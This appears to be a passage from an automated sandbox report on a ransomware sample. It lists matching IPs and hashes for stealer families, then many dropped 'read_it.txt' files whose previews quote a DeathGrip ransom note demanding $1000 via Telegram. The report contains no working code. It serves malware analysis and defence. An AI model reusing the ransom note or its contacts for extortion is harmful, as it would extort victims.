                                      rentry.co0U9NY2PzhK.exeGet hashmaliciousPython Stealer, CStealer, ChaosBrowse
                                      • 172.67.75.40
                                      qlk8old6p9.exeGet hashmaliciousPython Stealer, CStealer, ChaosBrowse
                                      • 172.67.75.40
                                      quotation.jsGet hashmaliciousUnknownBrowse
                                      • 104.26.3.16
                                      Quote.jsGet hashmaliciousUnknownBrowse
                                      • 104.26.3.16
                                      SecuriteInfo.com.Win64.MalwareX-gen.9087.16441.exeGet hashmaliciousUnknownBrowse
                                      • 104.26.3.16
                                      SecuriteInfo.com.Win64.MalwareX-gen.11541.5330.exeGet hashmaliciousUnknownBrowse
                                      • 104.26.3.16
                                      SecuriteInfo.com.Win64.MalwareX-gen.9087.16441.exeGet hashmaliciousUnknownBrowse
                                      • 104.26.3.16
                                      SecuriteInfo.com.Win64.MalwareX-gen.11541.5330.exeGet hashmaliciousUnknownBrowse
                                      • 104.26.2.16
                                      CV.vbsGet hashmaliciousXmrigBrowse
                                      • 104.26.3.16
                                      SecuriteInfo.com.Trojan.GenericFCA.Script.33276.27996.26811.exeGet hashmaliciousUnknownBrowse
                                      • 104.26.2.16

                                      ASNs

                                      MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                      CLOUDFLARENETUS9DP4y36Dlu.exeGet hashmaliciousUnknownBrowse
                                      • 188.114.96.3
                                      0U9NY2PzhK.exeGet hashmaliciousPython Stealer, CStealer, ChaosBrowse
                                      • 172.67.75.40
                                      icTynpKakZ.exeGet hashmaliciousUnknownBrowse
                                      • 104.26.11.3
                                      qlk8old6p9.exeGet hashmaliciousPython Stealer, CStealer, ChaosBrowse
                                      • 172.67.75.40
                                      04-09.htmGet hashmaliciousUnknownBrowse
                                      • 104.17.25.14
                                      http://gooel.comGet hashmaliciousUnknownBrowse
                                      • 162.247.243.39
                                      1YJgPEJr4V.exeGet hashmaliciousUnknownBrowse
                                      • 104.26.0.5
                                      MQcD9IhgQD.exeGet hashmaliciousSnake KeyloggerBrowse
                                      • 188.114.96.3
                                      BrowserUpdater.exeGet hashmaliciousUnknownBrowse
                                      • 104.21.90.99
                                      eYJh5eegYh.exeGet hashmaliciousUnknownBrowse
                                      • 172.67.70.230

                                      JA3 Fingerprints

                                      No context

                                      Dropped Files

                                      MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                      C:\Users\user\AppData\Local\Temp\_MEI76562\Crypto\Cipher\_ARC4.pyd0U9NY2PzhK.exeGet hashmaliciousPython Stealer, CStealer, ChaosBrowse
                                        qlk8old6p9.exeGet hashmaliciousPython Stealer, CStealer, ChaosBrowse
                                          tjigfd64.exeGet hashmaliciousLummaC StealerBrowse
                                            tjigfd64.exeGet hashmaliciousLummaC StealerBrowse
                                              neverlose.exeGet hashmaliciousDiscord Token StealerBrowse
                                                dXaIbmbdKj.exeGet hashmaliciousVidarBrowse
                                                  visabuilder.exeGet hashmaliciousPython Stealer, Discord Token StealerBrowse
                                                    allchecker.exeGet hashmaliciousPython Stealer, CStealerBrowse
                                                      LisectAVT_2403002A_396.exeGet hashmaliciousPython StealerBrowse
                                                        00#U2800.exeGet hashmaliciousPython StealerBrowse

                                                          Created / dropped Files

                                                          C:\ProgramData\Microsoft\ClickToRun\MachineData\Catalog\Packages\{9AC08E99-230B-47E8-9721-4577B7F124EA}\{1A8308C7-90D1-4200-B16E-646F163A08E8}\read_it.txt

                                                          Download File
                                                          Process:C:\Users\user\AppData\Roaming\svchost.exe
                                                          File Type:ASCII text, with CRLF line terminators
                                                          Category:dropped
                                                          Size (bytes):470
                                                          Entropy (8bit):4.6966693482751545
                                                          Encrypted:false
                                                          SSDEEP:6:6mCdVIIFKIlLMBgaIsEbsrIuQT9VH3RIG6hoNr4g7F8JqNByldQ2WbvF7HeIgAHz:WKceUsrIpRIBhGcgBold0bvJMcKqLv
                                                          MD5:8D343BF17EF14ED4108D2DB0F866100A
                                                          SHA1:C40E7C3D21224852317C9FAA94FB9491798AFE64
                                                          SHA-256:FF6234D40F59879BFB8CBC051303E5C40B7FAAB945A8B867937146CF693032A3
                                                          SHA-512:5EF8D0A32C7B00393F9CCEC32EC5B65532C0CB15F7F03BD93920FE74D365A4805DA55B26BC0C6ED56B96A47A1C186A673147CB67539A6E907E82416B331E9303
                                                          Malicious:false
                                                          Preview:DeathGrip Ransomware Attack | t.me/DeathGripRansomware....This computer is attacked by russian ransomware community of professional black hat hackers. ..Your every single documents / details is now under observation of those hackers...If you want to get it back then you have to pay 1000$ for it.....This Attack Is Done By Team RansomVerse You Can Find Us On Telegram.. @DeathGripRansomware Contact The Owner For The Decrypter Of This Ransomware....#DeathGripMalware..

                                                          C:\ProgramData\Microsoft\ClickToRun\ProductReleases\78614DC7-9853-4481-BCFD-A5C14DED5516\en-us.16\read_it.txt

                                                          Download File
                                                          Process:C:\Users\user\AppData\Roaming\svchost.exe
                                                          File Type:ASCII text, with CRLF line terminators
                                                          Category:dropped
                                                          Size (bytes):470
                                                          Entropy (8bit):4.6966693482751545
                                                          Encrypted:false
                                                          SSDEEP:6:6mCdVIIFKIlLMBgaIsEbsrIuQT9VH3RIG6hoNr4g7F8JqNByldQ2WbvF7HeIgAHz:WKceUsrIpRIBhGcgBold0bvJMcKqLv
                                                          MD5:8D343BF17EF14ED4108D2DB0F866100A
                                                          SHA1:C40E7C3D21224852317C9FAA94FB9491798AFE64
                                                          SHA-256:FF6234D40F59879BFB8CBC051303E5C40B7FAAB945A8B867937146CF693032A3
                                                          SHA-512:5EF8D0A32C7B00393F9CCEC32EC5B65532C0CB15F7F03BD93920FE74D365A4805DA55B26BC0C6ED56B96A47A1C186A673147CB67539A6E907E82416B331E9303
                                                          Malicious:false
                                                          Preview:DeathGrip Ransomware Attack | t.me/DeathGripRansomware....This computer is attacked by russian ransomware community of professional black hat hackers. ..Your every single documents / details is now under observation of those hackers...If you want to get it back then you have to pay 1000$ for it.....This Attack Is Done By Team RansomVerse You Can Find Us On Telegram.. @DeathGripRansomware Contact The Owner For The Decrypter Of This Ransomware....#DeathGripMalware..

                                                          C:\ProgramData\Microsoft\ClickToRun\ProductReleases\78614DC7-9853-4481-BCFD-A5C14DED5516\read_it.txt

                                                          Download File
                                                          Process:C:\Users\user\AppData\Roaming\svchost.exe
                                                          File Type:ASCII text, with CRLF line terminators
                                                          Category:dropped
                                                          Size (bytes):470
                                                          Entropy (8bit):4.6966693482751545
                                                          Encrypted:false
                                                          SSDEEP:6:6mCdVIIFKIlLMBgaIsEbsrIuQT9VH3RIG6hoNr4g7F8JqNByldQ2WbvF7HeIgAHz:WKceUsrIpRIBhGcgBold0bvJMcKqLv
                                                          MD5:8D343BF17EF14ED4108D2DB0F866100A
                                                          SHA1:C40E7C3D21224852317C9FAA94FB9491798AFE64
                                                          SHA-256:FF6234D40F59879BFB8CBC051303E5C40B7FAAB945A8B867937146CF693032A3
                                                          SHA-512:5EF8D0A32C7B00393F9CCEC32EC5B65532C0CB15F7F03BD93920FE74D365A4805DA55B26BC0C6ED56B96A47A1C186A673147CB67539A6E907E82416B331E9303
                                                          Malicious:false
                                                          Preview:DeathGrip Ransomware Attack | t.me/DeathGripRansomware....This computer is attacked by russian ransomware community of professional black hat hackers. ..Your every single documents / details is now under observation of those hackers...If you want to get it back then you have to pay 1000$ for it.....This Attack Is Done By Team RansomVerse You Can Find Us On Telegram.. @DeathGripRansomware Contact The Owner For The Decrypter Of This Ransomware....#DeathGripMalware..

                                                          C:\ProgramData\Microsoft\ClickToRun\ProductReleases\78614DC7-9853-4481-BCFD-A5C14DED5516\x-none.16\read_it.txt

                                                          Download File
                                                          Process:C:\Users\user\AppData\Roaming\svchost.exe
                                                          File Type:ASCII text, with CRLF line terminators
                                                          Category:dropped
                                                          Size (bytes):470
                                                          Entropy (8bit):4.6966693482751545
                                                          Encrypted:false
                                                          SSDEEP:6:6mCdVIIFKIlLMBgaIsEbsrIuQT9VH3RIG6hoNr4g7F8JqNByldQ2WbvF7HeIgAHz:WKceUsrIpRIBhGcgBold0bvJMcKqLv
                                                          MD5:8D343BF17EF14ED4108D2DB0F866100A
                                                          SHA1:C40E7C3D21224852317C9FAA94FB9491798AFE64
                                                          SHA-256:FF6234D40F59879BFB8CBC051303E5C40B7FAAB945A8B867937146CF693032A3
                                                          SHA-512:5EF8D0A32C7B00393F9CCEC32EC5B65532C0CB15F7F03BD93920FE74D365A4805DA55B26BC0C6ED56B96A47A1C186A673147CB67539A6E907E82416B331E9303
                                                          Malicious:false
                                                          Preview:DeathGrip Ransomware Attack | t.me/DeathGripRansomware....This computer is attacked by russian ransomware community of professional black hat hackers. ..Your every single documents / details is now under observation of those hackers...If you want to get it back then you have to pay 1000$ for it.....This Attack Is Done By Team RansomVerse You Can Find Us On Telegram.. @DeathGripRansomware Contact The Owner For The Decrypter Of This Ransomware....#DeathGripMalware..

                                                          C:\ProgramData\Microsoft\ClickToRun\read_it.txt

                                                          Download File
                                                          Process:C:\Users\user\AppData\Roaming\svchost.exe
                                                          File Type:ASCII text, with CRLF line terminators
                                                          Category:dropped
                                                          Size (bytes):470
                                                          Entropy (8bit):4.6966693482751545
                                                          Encrypted:false
                                                          SSDEEP:6:6mCdVIIFKIlLMBgaIsEbsrIuQT9VH3RIG6hoNr4g7F8JqNByldQ2WbvF7HeIgAHz:WKceUsrIpRIBhGcgBold0bvJMcKqLv
                                                          MD5:8D343BF17EF14ED4108D2DB0F866100A
                                                          SHA1:C40E7C3D21224852317C9FAA94FB9491798AFE64
                                                          SHA-256:FF6234D40F59879BFB8CBC051303E5C40B7FAAB945A8B867937146CF693032A3
                                                          SHA-512:5EF8D0A32C7B00393F9CCEC32EC5B65532C0CB15F7F03BD93920FE74D365A4805DA55B26BC0C6ED56B96A47A1C186A673147CB67539A6E907E82416B331E9303
                                                          Malicious:false
                                                          Preview:DeathGrip Ransomware Attack | t.me/DeathGripRansomware....This computer is attacked by russian ransomware community of professional black hat hackers. ..Your every single documents / details is now under observation of those hackers...If you want to get it back then you have to pay 1000$ for it.....This Attack Is Done By Team RansomVerse You Can Find Us On Telegram.. @DeathGripRansomware Contact The Owner For The Decrypter Of This Ransomware....#DeathGripMalware..

                                                          C:\ProgramData\Microsoft\ClickToRun\{9AC08E99-230B-47e8-9721-4577B7F124EA}\read_it.txt

                                                          Download File
                                                          Process:C:\Users\user\AppData\Roaming\svchost.exe
                                                          File Type:ASCII text, with CRLF line terminators
                                                          Category:dropped
                                                          Size (bytes):470
                                                          Entropy (8bit):4.6966693482751545
                                                          Encrypted:false
                                                          SSDEEP:6:6mCdVIIFKIlLMBgaIsEbsrIuQT9VH3RIG6hoNr4g7F8JqNByldQ2WbvF7HeIgAHz:WKceUsrIpRIBhGcgBold0bvJMcKqLv
                                                          MD5:8D343BF17EF14ED4108D2DB0F866100A
                                                          SHA1:C40E7C3D21224852317C9FAA94FB9491798AFE64
                                                          SHA-256:FF6234D40F59879BFB8CBC051303E5C40B7FAAB945A8B867937146CF693032A3
                                                          SHA-512:5EF8D0A32C7B00393F9CCEC32EC5B65532C0CB15F7F03BD93920FE74D365A4805DA55B26BC0C6ED56B96A47A1C186A673147CB67539A6E907E82416B331E9303
                                                          Malicious:false
                                                          Preview:DeathGrip Ransomware Attack | t.me/DeathGripRansomware....This computer is attacked by russian ransomware community of professional black hat hackers. ..Your every single documents / details is now under observation of those hackers...If you want to get it back then you have to pay 1000$ for it.....This Attack Is Done By Team RansomVerse You Can Find Us On Telegram.. @DeathGripRansomware Contact The Owner For The Decrypter Of This Ransomware....#DeathGripMalware..

                                                          C:\ProgramData\Microsoft\Device Stage\Device\{113527a4-45d4-4b6f-b567-97838f1b04b0}\read_it.txt

                                                          Download File
                                                          Process:C:\Users\user\AppData\Roaming\svchost.exe
                                                          File Type:ASCII text, with CRLF line terminators
                                                          Category:dropped
                                                          Size (bytes):470
                                                          Entropy (8bit):4.6966693482751545
                                                          Encrypted:false
                                                          SSDEEP:6:6mCdVIIFKIlLMBgaIsEbsrIuQT9VH3RIG6hoNr4g7F8JqNByldQ2WbvF7HeIgAHz:WKceUsrIpRIBhGcgBold0bvJMcKqLv
                                                          MD5:8D343BF17EF14ED4108D2DB0F866100A
                                                          SHA1:C40E7C3D21224852317C9FAA94FB9491798AFE64
                                                          SHA-256:FF6234D40F59879BFB8CBC051303E5C40B7FAAB945A8B867937146CF693032A3
                                                          SHA-512:5EF8D0A32C7B00393F9CCEC32EC5B65532C0CB15F7F03BD93920FE74D365A4805DA55B26BC0C6ED56B96A47A1C186A673147CB67539A6E907E82416B331E9303
                                                          Malicious:false
                                                          Preview:DeathGrip Ransomware Attack | t.me/DeathGripRansomware....This computer is attacked by russian ransomware community of professional black hat hackers. ..Your every single documents / details is now under observation of those hackers...If you want to get it back then you have to pay 1000$ for it.....This Attack Is Done By Team RansomVerse You Can Find Us On Telegram.. @DeathGripRansomware Contact The Owner For The Decrypter Of This Ransomware....#DeathGripMalware..

                                                          C:\ProgramData\Microsoft\Device Stage\Device\{8702d817-5aad-4674-9ef3-4d3decd87120}\read_it.txt

                                                          Download File
                                                          Process:C:\Users\user\AppData\Roaming\svchost.exe
                                                          File Type:ASCII text, with CRLF line terminators
                                                          Category:dropped
                                                          Size (bytes):470
                                                          Entropy (8bit):4.6966693482751545
                                                          Encrypted:false
                                                          SSDEEP:6:6mCdVIIFKIlLMBgaIsEbsrIuQT9VH3RIG6hoNr4g7F8JqNByldQ2WbvF7HeIgAHz:WKceUsrIpRIBhGcgBold0bvJMcKqLv
                                                          MD5:8D343BF17EF14ED4108D2DB0F866100A
                                                          SHA1:C40E7C3D21224852317C9FAA94FB9491798AFE64
                                                          SHA-256:FF6234D40F59879BFB8CBC051303E5C40B7FAAB945A8B867937146CF693032A3
                                                          SHA-512:5EF8D0A32C7B00393F9CCEC32EC5B65532C0CB15F7F03BD93920FE74D365A4805DA55B26BC0C6ED56B96A47A1C186A673147CB67539A6E907E82416B331E9303
                                                          Malicious:false
                                                          Preview:DeathGrip Ransomware Attack | t.me/DeathGripRansomware....This computer is attacked by russian ransomware community of professional black hat hackers. ..Your every single documents / details is now under observation of those hackers...If you want to get it back then you have to pay 1000$ for it.....This Attack Is Done By Team RansomVerse You Can Find Us On Telegram.. @DeathGripRansomware Contact The Owner For The Decrypter Of This Ransomware....#DeathGripMalware..

                                                          C:\ProgramData\Microsoft\Device Stage\Task\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\en-GB\read_it.txt

                                                          Download File
                                                          Process:C:\Users\user\AppData\Roaming\svchost.exe
                                                          File Type:ASCII text, with CRLF line terminators
                                                          Category:dropped
                                                          Size (bytes):470
                                                          Entropy (8bit):4.6966693482751545
                                                          Encrypted:false
                                                          SSDEEP:6:6mCdVIIFKIlLMBgaIsEbsrIuQT9VH3RIG6hoNr4g7F8JqNByldQ2WbvF7HeIgAHz:WKceUsrIpRIBhGcgBold0bvJMcKqLv
                                                          MD5:8D343BF17EF14ED4108D2DB0F866100A
                                                          SHA1:C40E7C3D21224852317C9FAA94FB9491798AFE64
                                                          SHA-256:FF6234D40F59879BFB8CBC051303E5C40B7FAAB945A8B867937146CF693032A3
                                                          SHA-512:5EF8D0A32C7B00393F9CCEC32EC5B65532C0CB15F7F03BD93920FE74D365A4805DA55B26BC0C6ED56B96A47A1C186A673147CB67539A6E907E82416B331E9303
                                                          Malicious:false
                                                          Preview:DeathGrip Ransomware Attack | t.me/DeathGripRansomware....This computer is attacked by russian ransomware community of professional black hat hackers. ..Your every single documents / details is now under observation of those hackers...If you want to get it back then you have to pay 1000$ for it.....This Attack Is Done By Team RansomVerse You Can Find Us On Telegram.. @DeathGripRansomware Contact The Owner For The Decrypter Of This Ransomware....#DeathGripMalware..

                                                          C:\ProgramData\Microsoft\Device Stage\Task\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\read_it.txt

                                                          Download File
                                                          Process:C:\Users\user\AppData\Roaming\svchost.exe
                                                          File Type:ASCII text, with CRLF line terminators
                                                          Category:dropped
                                                          Size (bytes):470
                                                          Entropy (8bit):4.6966693482751545
                                                          Encrypted:false
                                                          SSDEEP:6:6mCdVIIFKIlLMBgaIsEbsrIuQT9VH3RIG6hoNr4g7F8JqNByldQ2WbvF7HeIgAHz:WKceUsrIpRIBhGcgBold0bvJMcKqLv
                                                          MD5:8D343BF17EF14ED4108D2DB0F866100A
                                                          SHA1:C40E7C3D21224852317C9FAA94FB9491798AFE64
                                                          SHA-256:FF6234D40F59879BFB8CBC051303E5C40B7FAAB945A8B867937146CF693032A3
                                                          SHA-512:5EF8D0A32C7B00393F9CCEC32EC5B65532C0CB15F7F03BD93920FE74D365A4805DA55B26BC0C6ED56B96A47A1C186A673147CB67539A6E907E82416B331E9303
                                                          Malicious:false
                                                          Preview:DeathGrip Ransomware Attack | t.me/DeathGripRansomware....This computer is attacked by russian ransomware community of professional black hat hackers. ..Your every single documents / details is now under observation of those hackers...If you want to get it back then you have to pay 1000$ for it.....This Attack Is Done By Team RansomVerse You Can Find Us On Telegram.. @DeathGripRansomware Contact The Owner For The Decrypter Of This Ransomware....#DeathGripMalware..

                                                          C:\ProgramData\Microsoft\Device Stage\Task\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\read_it.txt

                                                          Download File
                                                          Process:C:\Users\user\AppData\Roaming\svchost.exe
                                                          File Type:ASCII text, with CRLF line terminators
                                                          Category:dropped
                                                          Size (bytes):470
                                                          Entropy (8bit):4.6966693482751545
                                                          Encrypted:false
                                                          SSDEEP:6:6mCdVIIFKIlLMBgaIsEbsrIuQT9VH3RIG6hoNr4g7F8JqNByldQ2WbvF7HeIgAHz:WKceUsrIpRIBhGcgBold0bvJMcKqLv
                                                          MD5:8D343BF17EF14ED4108D2DB0F866100A
                                                          SHA1:C40E7C3D21224852317C9FAA94FB9491798AFE64
                                                          SHA-256:FF6234D40F59879BFB8CBC051303E5C40B7FAAB945A8B867937146CF693032A3
                                                          SHA-512:5EF8D0A32C7B00393F9CCEC32EC5B65532C0CB15F7F03BD93920FE74D365A4805DA55B26BC0C6ED56B96A47A1C186A673147CB67539A6E907E82416B331E9303
                                                          Malicious:false
                                                          Preview:DeathGrip Ransomware Attack | t.me/DeathGripRansomware....This computer is attacked by russian ransomware community of professional black hat hackers. ..Your every single documents / details is now under observation of those hackers...If you want to get it back then you have to pay 1000$ for it.....This Attack Is Done By Team RansomVerse You Can Find Us On Telegram.. @DeathGripRansomware Contact The Owner For The Decrypter Of This Ransomware....#DeathGripMalware..

                                                          C:\ProgramData\Microsoft\Diagnosis\DownloadedSettings\read_it.txt

                                                          Download File
                                                          Process:C:\Users\user\AppData\Roaming\svchost.exe
                                                          File Type:ASCII text, with CRLF line terminators
                                                          Category:dropped
                                                          Size (bytes):470
                                                          Entropy (8bit):4.6966693482751545
                                                          Encrypted:false
                                                          SSDEEP:6:6mCdVIIFKIlLMBgaIsEbsrIuQT9VH3RIG6hoNr4g7F8JqNByldQ2WbvF7HeIgAHz:WKceUsrIpRIBhGcgBold0bvJMcKqLv
                                                          MD5:8D343BF17EF14ED4108D2DB0F866100A
                                                          SHA1:C40E7C3D21224852317C9FAA94FB9491798AFE64
                                                          SHA-256:FF6234D40F59879BFB8CBC051303E5C40B7FAAB945A8B867937146CF693032A3
                                                          SHA-512:5EF8D0A32C7B00393F9CCEC32EC5B65532C0CB15F7F03BD93920FE74D365A4805DA55B26BC0C6ED56B96A47A1C186A673147CB67539A6E907E82416B331E9303
                                                          Malicious:false
                                                          Preview:DeathGrip Ransomware Attack | t.me/DeathGripRansomware....This computer is attacked by russian ransomware community of professional black hat hackers. ..Your every single documents / details is now under observation of those hackers...If you want to get it back then you have to pay 1000$ for it.....This Attack Is Done By Team RansomVerse You Can Find Us On Telegram.. @DeathGripRansomware Contact The Owner For The Decrypter Of This Ransomware....#DeathGripMalware..

                                                          C:\ProgramData\Microsoft\Diagnosis\ScenariosSqlStore\read_it.txt

                                                          Download File
                                                          Process:C:\Users\user\AppData\Roaming\svchost.exe
                                                          File Type:ASCII text, with CRLF line terminators
                                                          Category:dropped
                                                          Size (bytes):470
                                                          Entropy (8bit):4.6966693482751545
                                                          Encrypted:false
                                                          SSDEEP:6:6mCdVIIFKIlLMBgaIsEbsrIuQT9VH3RIG6hoNr4g7F8JqNByldQ2WbvF7HeIgAHz:WKceUsrIpRIBhGcgBold0bvJMcKqLv
                                                          MD5:8D343BF17EF14ED4108D2DB0F866100A
                                                          SHA1:C40E7C3D21224852317C9FAA94FB9491798AFE64
                                                          SHA-256:FF6234D40F59879BFB8CBC051303E5C40B7FAAB945A8B867937146CF693032A3
                                                          SHA-512:5EF8D0A32C7B00393F9CCEC32EC5B65532C0CB15F7F03BD93920FE74D365A4805DA55B26BC0C6ED56B96A47A1C186A673147CB67539A6E907E82416B331E9303
                                                          Malicious:false
                                                          Preview:DeathGrip Ransomware Attack | t.me/DeathGripRansomware....This computer is attacked by russian ransomware community of professional black hat hackers. ..Your every single documents / details is now under observation of those hackers...If you want to get it back then you have to pay 1000$ for it.....This Attack Is Done By Team RansomVerse You Can Find Us On Telegram.. @DeathGripRansomware Contact The Owner For The Decrypter Of This Ransomware....#DeathGripMalware..

                                                          C:\ProgramData\Microsoft\EdgeUpdate\Log\read_it.txt

                                                          Download File
                                                          Process:C:\Users\user\AppData\Roaming\svchost.exe
                                                          File Type:ASCII text, with CRLF line terminators
                                                          Category:dropped
                                                          Size (bytes):470
                                                          Entropy (8bit):4.6966693482751545
                                                          Encrypted:false
                                                          SSDEEP:6:6mCdVIIFKIlLMBgaIsEbsrIuQT9VH3RIG6hoNr4g7F8JqNByldQ2WbvF7HeIgAHz:WKceUsrIpRIBhGcgBold0bvJMcKqLv
                                                          MD5:8D343BF17EF14ED4108D2DB0F866100A
                                                          SHA1:C40E7C3D21224852317C9FAA94FB9491798AFE64
                                                          SHA-256:FF6234D40F59879BFB8CBC051303E5C40B7FAAB945A8B867937146CF693032A3
                                                          SHA-512:5EF8D0A32C7B00393F9CCEC32EC5B65532C0CB15F7F03BD93920FE74D365A4805DA55B26BC0C6ED56B96A47A1C186A673147CB67539A6E907E82416B331E9303
                                                          Malicious:false
                                                          Preview:DeathGrip Ransomware Attack | t.me/DeathGripRansomware....This computer is attacked by russian ransomware community of professional black hat hackers. ..Your every single documents / details is now under observation of those hackers...If you want to get it back then you have to pay 1000$ for it.....This Attack Is Done By Team RansomVerse You Can Find Us On Telegram.. @DeathGripRansomware Contact The Owner For The Decrypter Of This Ransomware....#DeathGripMalware..

                                                          C:\ProgramData\Microsoft\IdentityCRL\INT\read_it.txt

                                                          Download File
                                                          Process:C:\Users\user\AppData\Roaming\svchost.exe
                                                          File Type:ASCII text, with CRLF line terminators
                                                          Category:dropped
                                                          Size (bytes):470
                                                          Entropy (8bit):4.6966693482751545
                                                          Encrypted:false
                                                          SSDEEP:6:6mCdVIIFKIlLMBgaIsEbsrIuQT9VH3RIG6hoNr4g7F8JqNByldQ2WbvF7HeIgAHz:WKceUsrIpRIBhGcgBold0bvJMcKqLv
                                                          MD5:8D343BF17EF14ED4108D2DB0F866100A
                                                          SHA1:C40E7C3D21224852317C9FAA94FB9491798AFE64
                                                          SHA-256:FF6234D40F59879BFB8CBC051303E5C40B7FAAB945A8B867937146CF693032A3
                                                          SHA-512:5EF8D0A32C7B00393F9CCEC32EC5B65532C0CB15F7F03BD93920FE74D365A4805DA55B26BC0C6ED56B96A47A1C186A673147CB67539A6E907E82416B331E9303
                                                          Malicious:false
                                                          Preview:DeathGrip Ransomware Attack | t.me/DeathGripRansomware....This computer is attacked by russian ransomware community of professional black hat hackers. ..Your every single documents / details is now under observation of those hackers...If you want to get it back then you have to pay 1000$ for it.....This Attack Is Done By Team RansomVerse You Can Find Us On Telegram.. @DeathGripRansomware Contact The Owner For The Decrypter Of This Ransomware....#DeathGripMalware..

                                                          C:\ProgramData\Microsoft\IdentityCRL\production\read_it.txt

                                                          Download File
                                                          Process:C:\Users\user\AppData\Roaming\svchost.exe
                                                          File Type:ASCII text, with CRLF line terminators
                                                          Category:dropped
                                                          Size (bytes):470
                                                          Entropy (8bit):4.6966693482751545
                                                          Encrypted:false
                                                          SSDEEP:6:6mCdVIIFKIlLMBgaIsEbsrIuQT9VH3RIG6hoNr4g7F8JqNByldQ2WbvF7HeIgAHz:WKceUsrIpRIBhGcgBold0bvJMcKqLv
                                                          MD5:8D343BF17EF14ED4108D2DB0F866100A
                                                          SHA1:C40E7C3D21224852317C9FAA94FB9491798AFE64
                                                          SHA-256:FF6234D40F59879BFB8CBC051303E5C40B7FAAB945A8B867937146CF693032A3
                                                          SHA-512:5EF8D0A32C7B00393F9CCEC32EC5B65532C0CB15F7F03BD93920FE74D365A4805DA55B26BC0C6ED56B96A47A1C186A673147CB67539A6E907E82416B331E9303
                                                          Malicious:false
                                                          Preview:DeathGrip Ransomware Attack | t.me/DeathGripRansomware....This computer is attacked by russian ransomware community of professional black hat hackers. ..Your every single documents / details is now under observation of those hackers...If you want to get it back then you have to pay 1000$ for it.....This Attack Is Done By Team RansomVerse You Can Find Us On Telegram.. @DeathGripRansomware Contact The Owner For The Decrypter Of This Ransomware....#DeathGripMalware..

                                                          C:\ProgramData\Microsoft\Network\Downloader\edb.chk

                                                          Download File
                                                          Process:C:\Windows\System32\svchost.exe
                                                          File Type:data
                                                          Category:dropped
                                                          Size (bytes):8192
                                                          Entropy (8bit):0.35999246155449205
                                                          Encrypted:false
                                                          SSDEEP:6:6xDoaaD0JOCEfMuaaD0JOCEfMKQmDMxDoaaD0JOCEfMuaaD0JOCEfMKQmD:haaD0JcaaD0JwQQnaaD0JcaaD0JwQQ
                                                          MD5:D6D3830984AEC72B32E4EF5030B32290
                                                          SHA1:A645195729EB557B4B773E137AA78ECB17CFB96D
                                                          SHA-256:09BA30C4D4F2F7FEC3C62A7AD0D5103CE6662FDAB91F62803144CCB6B20E4604
                                                          SHA-512:44C27B21C2BB77D57AC1499ABFEB4FA11B45A7EC856276696132498302733B88EE7D748E05ABD6DAC09C8A478CCC803F16A8E1FF7305245F82E382D2617AA69F
                                                          Malicious:false
                                                          Preview:*.>...........~.....D./..;...{..................C:\ProgramData\Microsoft\Network\Downloader\.........................................................................................................................................................................................................................C:\ProgramData\Microsoft\Network\Downloader\..........................................................................................................................................................................................................................0u..................@...@......................................................~.............................................................................................................................................................................................................................................................................................................................................................

                                                          C:\ProgramData\Microsoft\Network\Downloader\edb.log

                                                          Download File
                                                          Process:C:\Windows\System32\svchost.exe
                                                          File Type:data
                                                          Category:dropped
                                                          Size (bytes):1310720
                                                          Entropy (8bit):0.8063208214623928
                                                          Encrypted:false
                                                          SSDEEP:1536:RJszRK0I9i0k0I9wXq0I9UGJC/PQJCmJCovVsnQ9Sii1GY9zOoRXTpMNYpKhvUAx:RJE+Lfki1GjHwU/+vVhWqpA
                                                          MD5:ABD0DF21EF7B4A4D9C8E548C92159B7D
                                                          SHA1:E78960C23CA1E42ABA521E5ADC0FB5573812D32C
                                                          SHA-256:539A099B2233F2EB610C0915CC2CECC45EB3941A2C113850FDEF56B2B382F2E0
                                                          SHA-512:118961262063985FA866E54BBEC4CE9A50AD734274B059EF73BF9188BBF3C5D4A779BDB223FEF680850B6413A08DEC65A61F5C3B45872AB86568964EB639C5D7
                                                          Malicious:false
                                                          Preview:..Q^........@..@.....{...;...{..........<...D./..;...{..................C:\ProgramData\Microsoft\Network\Downloader\.........................................................................................................................................................................................................................C:\ProgramData\Microsoft\Network\Downloader\..........................................................................................................................................................................................................................0u..................@...@.....................................3~L.#.........`h.................h.......1.......X\...;...{..................C.:.\.P.r.o.g.r.a.m.D.a.t.a.\.M.i.c.r.o.s.o.f.t.\.N.e.t.w.o.r.k.\.D.o.w.n.l.o.a.d.e.r.\.q.m.g.r...d.b....................................................................................................................................................................

                                                          C:\ProgramData\Microsoft\Network\Downloader\qmgr.db

                                                          Download File
                                                          Process:C:\Windows\System32\svchost.exe
                                                          File Type:Extensible storage engine DataBase, version 0x620, checksum 0x1f66353e, page size 16384, Windows version 10.0
                                                          Category:dropped
                                                          Size (bytes):1048576
                                                          Entropy (8bit):0.7864320050088061
                                                          Encrypted:false
                                                          SSDEEP:1536:TSB2ESB2SSjlK/IECXK0I9XGJCTgzEYkr3g16t2UPkLk+k0+lKuy9nyS2kILzsL6:TazauEezm2U
                                                          MD5:78AA86CDC87CC491E94AB25A1AB22DED
                                                          SHA1:E0C0AB110622751FDE1F50FFD6ECA8C046B9717E
                                                          SHA-256:3E30163FF249E5E18D4E427430CB12B23D422926DA24FB791C165695D849BF28
                                                          SHA-512:C21196936292ECC65506F955A0AF248F8B4CBDDA4B90199F4A0DFE944E5DFEAD7FBAF49712B74935C074535229347F12CE3E0C8962578FAC0AEBF4A8BE5FB493
                                                          Malicious:false
                                                          Preview:.f5>... ...............X\...;...{......................0.}..........|..:....|?.h.z..........|..0.}.........D./..;...{..........................................................................................................eJ......n....@...................................................................................................... ............................................................................................................................................................................................................2...{...................................n.......|..................".9c.....|...........................#......0.}.....................................................................................................................................................................................................................................................................................................................................................

                                                          C:\ProgramData\Microsoft\Network\Downloader\qmgr.jfm

                                                          Download File
                                                          Process:C:\Windows\System32\svchost.exe
                                                          File Type:data
                                                          Category:dropped
                                                          Size (bytes):16384
                                                          Entropy (8bit):0.0796650317767422
                                                          Encrypted:false
                                                          SSDEEP:3:qW/lOetYeo34uqgwl/tES4iHKAZC/tlDqwl/tollmn/lZOPp3lll:ltrz64lglhANiD
                                                          MD5:7E0FD18608FE55D24B3423FB76BBB6FF
                                                          SHA1:ADFDFFBFD17993AC61A2BEECC1C6755C983554FB
                                                          SHA-256:899ADF141A09C65C58884D122DC58D3BA5FEA43B4AB7E86351A311861E5D8EEB
